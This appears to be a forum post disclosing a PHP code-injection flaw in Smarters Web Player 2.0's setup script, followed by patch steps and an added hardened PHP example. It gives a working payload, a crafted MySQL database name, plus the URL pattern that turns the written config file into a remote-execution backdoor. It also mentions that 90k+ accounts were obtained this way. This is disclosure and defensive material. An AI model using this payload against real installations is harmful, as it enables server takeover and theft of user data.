Smarters Web Player 2.0 Exploit & Patch

Homer

Moderator
Apr 29, 2023
Here is a short summary of the latest exploit in Smarters Web Player 2.0, which we released proof of late last year, plus details of how to patch it. We've not released any of the 90k+ accounts (despite many, many people asking...) which were recovered and won't be releasing these as I have no interest in harming hard-working providers. Smarters seem to have made permission changes to their public instance so it is no longer vulnerable. It seems Smarters have also released a further version which includes a salt to (I think) encrypt the stored user details better; however, it is still vulnerable to this injection attack without further mitigation.

The Exploit:
When setting up the webplayer initially, a page named 'dbconfiguration.php' is used to create and populate a file named 'dbinfo.php' which contains the connection information for the MySQL database. This is facilitated by an AJAX call to 'includes/outer-ajax.php' with the db details. This page first checks the database is reachable using the entered details and, if all is OK, then saves the details to dbinfo.php; this is the vulnerable part. I was able to use a publicly accessible MySQL server with a database named ";eval($_GET['a']);$t=" (including quotes), which is a perfectly valid name for a MySQL database. This means the validation/connection check was passed and the details written to dbinfo.php looked something like this:

PHP:
<?php
$dbhost = "XXX.XXX.XXX.XXX"; //IP of an SQL server I have control over
$dbusername = "USER"; //Real username for above MySQL db
$dbpassword = "PASS"; //Real password for above MySQL db
$dbname = "";eval($_GET['a']);$t=""; //Exploited line, dbname is now blank but we have our eval clause in there.

So we can then call WEBPLAYERURL/dbinfo.php?a=PHPCODEHERE and anything we like can be executed. In most cases PHP code can be traversed and shell commands can be executed, giving a remote shell into the server.

Patching the exploit:
  1. The most obvious way to patch the exploit is to patch the vulnerable outer-ajax.php file to ensure no PHP escaping characters can be inserted into the file. I have included a patched outer-ajax.php below which returns an error if any such characters are attempted.
  2. File permissions - as soon as the webplayer is installed and configured, change the dbinfo.php file to be non-writeable by the user which the web server is running as.
  3. Best-practice firewall configuration: make sure no outbound MySQL connections (or anything unnecessary, for that matter...) are allowed.
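As an added example (not the author's patched outer-ajax.php and not Smarters' own code), here is a hardened way to write dbinfo.php in PHP: the identifier-like fields are whitelisted before anything is written, and every value is serialised with var_export(), so the db-name payload quoted above can no longer close the string literal. The field names come from the post; the regexes, the save path handling and the 0440 mode are this example's assumptions. Running it prints the validation errors for a sample built from the post's payload, followed by the rendered file showing that payload as an inert string.

```php
<?php
// Added example (not the author's hidden patch, not Smarters code): a
// hardened dbinfo.php writer. Identifier-like fields are whitelisted, and
// every value is emitted via var_export() so the post's payload
// ";eval($_GET['a']);$t=" becomes an inert single-quoted literal.
// Field names follow the post; the patterns are this example's assumptions.

function validate_db_details(array $d): array {
    $rules = [
        'dbhost'     => '/^[A-Za-z0-9.\-]{1,253}$/',  // hostname or IPv4
        'dbusername' => '/^[A-Za-z0-9_.\-]{1,64}$/',
        // MySQL allows more in a schema name; a config writer need not.
        'dbname'     => '/^[A-Za-z0-9_]{1,64}$/',
    ];
    $errors = [];
    foreach ($rules as $field => $re) {
        if (!is_string($d[$field] ?? null) || !preg_match($re, $d[$field])) {
            $errors[$field] = "invalid characters or length in $field";
        }
    }
    // Passwords contain punctuation by design, so only var_export() keeps them inert.
    if (!is_string($d['dbpassword'] ?? null)) {
        $errors['dbpassword'] = 'missing dbpassword';
    }
    return $errors;
}

function render_dbinfo(array $d): string {
    $out = "<?php\n";
    foreach (['dbhost', 'dbusername', 'dbpassword', 'dbname'] as $k) {
        // single-quoted literal with \ and ' escaped: " ; $ cannot break out
        $out .= sprintf('$%s = %s;', $k, var_export($d[$k], true)) . "\n";
    }
    return $out;
}

function save_dbinfo(string $path, array $d): array {
    $errors = validate_db_details($d);
    if ($errors !== []) {
        return $errors;                 // post's step 1: refuse to write
    }
    file_put_contents($path, render_dbinfo($d), LOCK_EX);
    chmod($path, 0440);                 // post's step 2: not web-writable
    return [];
}

// Constructed sample reusing the payload shape quoted in the post.
$sample = ['dbhost' => '203.0.113.10', 'dbusername' => 'USER',
           'dbpassword' => 'PASS', 'dbname' => '";eval($_GET[\'a\']);$t="'];
print_r(validate_db_details($sample));
echo render_dbinfo($sample);
```

The chmod only helps if the file's owner is not the web-server user; otherwise the owner must be changed as well, since an owner can always restore write permission.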